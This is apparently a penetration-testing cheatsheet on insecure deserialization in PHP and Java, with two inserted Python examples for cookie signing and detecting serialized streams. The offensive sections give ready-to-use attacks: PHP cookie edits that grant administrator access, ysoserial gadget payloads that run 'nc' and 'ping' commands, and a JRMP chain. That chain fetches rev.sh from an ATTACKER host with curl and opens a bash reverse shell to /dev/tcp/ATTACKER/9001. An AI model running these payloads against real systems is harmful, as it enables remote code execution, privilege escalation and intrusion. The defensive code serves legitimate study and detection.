
Insecure Deserialization Cheatsheet

 Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream.

The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize().

Basic Serialization

- Look for cookies (or other parameters) that hold base64-encoded or otherwise serialized data

You can change admin;b:0 to admin;b:1 --> which makes the application treat us as admin (b is the boolean type tag, so b:0 is false and b:1 is true)

PHP - Exploiting Data Types
- Look for cookies and any other serialized values
- Update the user value or the username to any user
- If required, update the access token, re-serialize it and try to access unauthorized data

Example
Update the data from 
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}
to
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

- Always try to update the content in the serialized object
Update the object from
O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"favhu4mwxv64b6mz5x6ga79wxs5k95op";s:11:"avatar_link";s:18:"users/gregg/avatar";}
to
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"zp46h5h7j8dbk07k04e57dgu67ayxsy7";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
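The cookie edits above work because the server trusts whatever PHP serialize() string the client hands back, and the i:0 edit works because PHP's loose == comparison (before PHP 8) treats the integer 0 as equal to any non-numeric string. The Python below is an added example, not code from this cheatsheet: it parses the page's own serialized strings into Python values, refuses input whose length prefixes disagree with the content (as unserialize() itself does), and shows the server-side fix, which is to HMAC-sign the cookie so any edit is detected and to compare tokens strictly by type and value. COOKIE_KEY, the function names and the sample array are assumptions constructed for this example.

```python
import base64
import hashlib
import hmac

# PHP serialize() strings copied from the cheatsheet above (lab values, not constructed here)
ORIGINAL = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}'
TAMPERED = 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}'

# Assumed server-side signing key; a constructed placeholder for this example only
COOKIE_KEY = b"constructed-demo-key"


def php_unserialize(data: str):
    """Parse a PHP serialize() string (types N, b, i, d, s, a, O) into Python values.
    Objects become dicts with the class name under '__class__'. Like PHP's unserialize(),
    it refuses input whose length or count prefixes disagree with the content."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError(f"trailing data at offset {pos}")
    return value

def _expect(data, pos, literal):
    if data[pos:pos + len(literal)] != literal:
        raise ValueError(f"expected {literal!r} at offset {pos}")
    return pos + len(literal)

def _counted(data, pos):
    # Read the decimal prefix up to ':' (the n in s:n: / a:n: / O:n:)
    end = data.index(":", pos)
    return int(data[pos:end]), end + 1

def _members(data, pos, count):
    # Read count key/value pairs and the closing brace of an array or object body
    items = {}
    for _ in range(count):
        key, pos = _parse(data, pos)
        value, pos = _parse(data, pos)
        items[key] = value
    return items, _expect(data, pos, "}")

def _parse(data, pos):
    tag = data[pos:pos + 1]
    if tag == "N":
        return None, _expect(data, pos + 1, ";")
    if tag in ("b", "i", "d"):
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (raw == "1") if tag == "b" else (int(raw) if tag == "i" else float(raw)), end + 1
    if tag == "s":
        length, pos = _counted(data, pos + 2)
        pos = _expect(data, pos, '"')
        text = data[pos:pos + length]          # PHP counts bytes; the samples are ASCII
        if len(text) != length:
            raise ValueError("string shorter than its declared length")
        return text, _expect(data, pos + length, '";')
    if tag == "a":
        count, pos = _counted(data, pos + 2)
        return _members(data, _expect(data, pos, "{"), count)
    if tag == "O":
        name_len, pos = _counted(data, pos + 2)
        pos = _expect(data, pos, '"')
        name = data[pos:pos + name_len]
        pos = _expect(data, pos + name_len, '":')
        count, pos = _counted(data, pos)
        props, pos = _members(data, _expect(data, pos, "{"), count)
        return {"__class__": name, **props}, pos
    raise ValueError(f"unknown type tag {tag!r} at offset {pos}")

def is_well_formed(data: str) -> bool:
    try:
        php_unserialize(data)
        return True
    except (ValueError, IndexError):
        return False

def sign_cookie(serialized: str, key: bytes = COOKIE_KEY) -> str:
    """Server side: append an HMAC so that any client-side edit of the object is detectable."""
    mac = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{serialized}|{mac}".encode()).decode()

def verify_cookie(cookie: str, key: bytes = COOKIE_KEY):
    """Return the parsed object only when the MAC is valid; None for edited, unsigned or malformed cookies."""
    try:
        serialized, sep, mac = base64.b64decode(cookie).decode().rpartition("|")
    except ValueError:  # bad base64 (binascii.Error) or bad UTF-8 both subclass ValueError
        return None
    expected = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    if not sep or not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    return php_unserialize(serialized) if is_well_formed(serialized) else None

def token_matches(presented, stored: str) -> bool:
    """Strict, constant-time token check. PHP's loose == (before PHP 8) treats the integer 0 as
    equal to any non-numeric string, which is what the i:0 edit above relies on; requiring a
    string and comparing with === semantics closes that."""
    return isinstance(presented, str) and hmac.compare_digest(presented.encode(), stored.encode())

if __name__ == "__main__":
    print(php_unserialize(ORIGINAL))
    print("signed cookie verifies:", verify_cookie(sign_cookie(ORIGINAL)) is not None)
    print("unsigned edited object accepted:", verify_cookie(base64.b64encode(TAMPERED.encode()).decode()) is not None)
    print("length mismatch well-formed:", is_well_formed(TAMPERED.replace("s:13:", "s:6:")))
```

Signing the cookie is only the first half of the fix; the stronger change is to stop handing serialized objects to the client at all and keep a random session identifier instead, so that unserialize() never runs on user-controlled input.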
Magic Methods 

Magic methods are a special subset of methods that you do not have to explicitly invoke. Instead, they are invoked automatically whenever a particular event or scenario occurs.

For example, __construct() is invoked whenever an object of the class is instantiated, similar to Python's __init__.

Some languages have magic methods that are invoked automatically during the deserialization process. For example, PHP's unserialize() method looks for and invokes an object's __wakeup() magic method.

In Java deserialization, the same applies to the ObjectInputStream.readObject() method, which is used to read data from the initial byte stream and essentially acts like a constructor for "re-initializing" a serialized object. However, Serializable classes can also declare their own readObject() method as follows:

private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException
{
    // implementation
}

A readObject() method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.


YSOSerial

#Requires Java 11 to run
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version

Download the latest package from https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar

java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080"

#base64 with line wrapping disabled (-w 0) so the payload stays on a single line
java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" | base64 -w 0 > output.txt

#Little bit of automation - generate all payloads at once
java -jar ../ysoserial.jar >yso 2>&1
cat yso | tr -d ' ' | cut -d "@" -f 1 | sed '1,8d' > payloads.txt
while read payloadname; do java -jar ../ysoserial.jar $payloadname "ping 10.10.10.10 -c 3" | base64 -w 0 > $payloadname; done < payloads.txt

#Run tcpdump to check if you are getting any response back
sudo tcpdump -i tap0 icmp

Or better, use the Burp extensions Java Serial Killer and Java Deserialization Scanner.
Exploiting Insecure Deserialization using JRMP

#Host a Reverse shell 
python -m http.server 8000

rev.sh 
bash -c 'exec bash -i &>/dev/tcp/ATTACKER/9001 <&1'

#Start a listener
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections3 "curl http://ATTACKER:8000/rev.sh -o /tmp/rev.sh; bash /tmp/rev.sh"

# Generate the payload and send it 
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:80 | base64 -w 0 > output.txt

#Start a new listener
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 82 CommonsCollections3 "bash /tmp/rev.sh"

# Generate the payload and send it (the JRMPClient host:port must match the listener port above)
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:82 | base64 -w 0 > output2.txt
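Everything generated in the two sections above, the ysoserial gadget chains and the JRMPClient payload alike, travels as a Java serialization stream, which always begins with the bytes AC ED 00 05 (the characters rO0AB once base64-encoded) followed by the class descriptor of the first object. That header is what a defender can spot in logs or at a proxy, and an allowlist of the classes the application really expects (the deny-by-default stance of Java's ObjectInputFilter, JEP 290) is what keeps the readObject() magic method of an unexpected class from ever running. The Python below is an added example and is not part of this cheatsheet or of ysoserial: it extracts the declared top-level class from a stream, scans constructed log lines for base64-encoded streams, and applies a constructed allowlist. ALLOWED_CLASSES, com.example.SessionToken, the log lines and the header-only test streams are all assumptions made for this example.

```python
import base64
import binascii
import re
import struct
from urllib.parse import unquote

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"     # STREAM_MAGIC + STREAM_VERSION written by ObjectOutputStream
TC_OBJECT, TC_CLASSDESC, TC_ARRAY = 0x73, 0x72, 0x75
B64_MAGIC = re.compile(r"rO0AB[A-Za-z0-9+/=]+")   # the magic bytes as they appear after base64 encoding

# Assumed allowlist of classes the application genuinely deserializes (constructed for this example);
# anything else is rejected, mirroring a deny-by-default ObjectInputFilter.
ALLOWED_CLASSES = {"com.example.SessionToken"}


def java_top_level_class(blob: bytes):
    """Return the class name declared for the first object in a Java serialization stream,
    or None if the bytes are not such a stream (or open with a type this parser skips)."""
    if not blob.startswith(JAVA_STREAM_MAGIC) or len(blob) < 8:
        return None
    if blob[4] not in (TC_OBJECT, TC_ARRAY) or blob[5] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", blob[6:8])     # class name is a length-prefixed UTF string
    name = blob[8:8 + name_len]
    if len(name) != name_len:
        return None
    return name.decode("utf-8", errors="replace")

def assess_class(class_name):
    if class_name is None:
        return "unparseable"
    return "allowed" if class_name in ALLOWED_CLASSES else "blocked"

def find_serialized_java(text: str):
    """Find base64-encoded Java streams in a request line, cookie or parameter string.
    Returns one (class_name, verdict) pair per hit."""
    hits = []
    for token in B64_MAGIC.findall(unquote(text)):   # URL-encoded padding (%3D) is decoded first
        try:
            blob = base64.b64decode(token)
        except (binascii.Error, ValueError):
            continue
        cls = java_top_level_class(blob)
        hits.append((cls, assess_class(cls)))
    return hits

def constructed_stream(class_name: str) -> bytes:
    """Constructed, header-only stream for testing: magic, TC_OBJECT, TC_CLASSDESC, class name,
    a dummy serialVersionUID, the SC_SERIALIZABLE flag and a zero field count. Real streams
    continue with field data; this parser never reads past the class name."""
    name = class_name.encode()
    return (JAVA_STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(name))
            + name + b"\x00" * 8 + b"\x02" + b"\x00\x00")

def b64_text(blob: bytes) -> str:
    return base64.b64encode(blob).decode()

# Constructed access-log lines (not real traffic) with the session cookie value appended
SAMPLE_LOG = [
    '10.0.0.5 "POST /api/profile" session='
    + b64_text(constructed_stream("com.example.SessionToken")).replace("=", "%3D"),   # URL-encoded padding
    '10.0.0.9 "POST /api/profile" session=' + b64_text(constructed_stream("java.util.HashMap")),
    '10.0.0.7 "GET /api/profile" session=dGhlbWU9ZGFyaw==',   # ordinary base64 text, no Java stream
]

def scan_log(lines):
    """Map each line index to the serialized-Java findings on that line (lines without any are omitted)."""
    report = {}
    for idx, line in enumerate(lines):
        hits = find_serialized_java(line)
        if hits:
            report[idx] = hits
    return report

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        for cls, verdict in hits:
            print(f"line {idx}: top-level class {cls!r} -> {verdict}")
```

The parser reads only the first class descriptor; nested objects carry their own descriptors, and a real ObjectInputFilter is consulted for every class the stream resolves, so treat this as triage for logs and proxies rather than a replacement for the filter inside the application.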

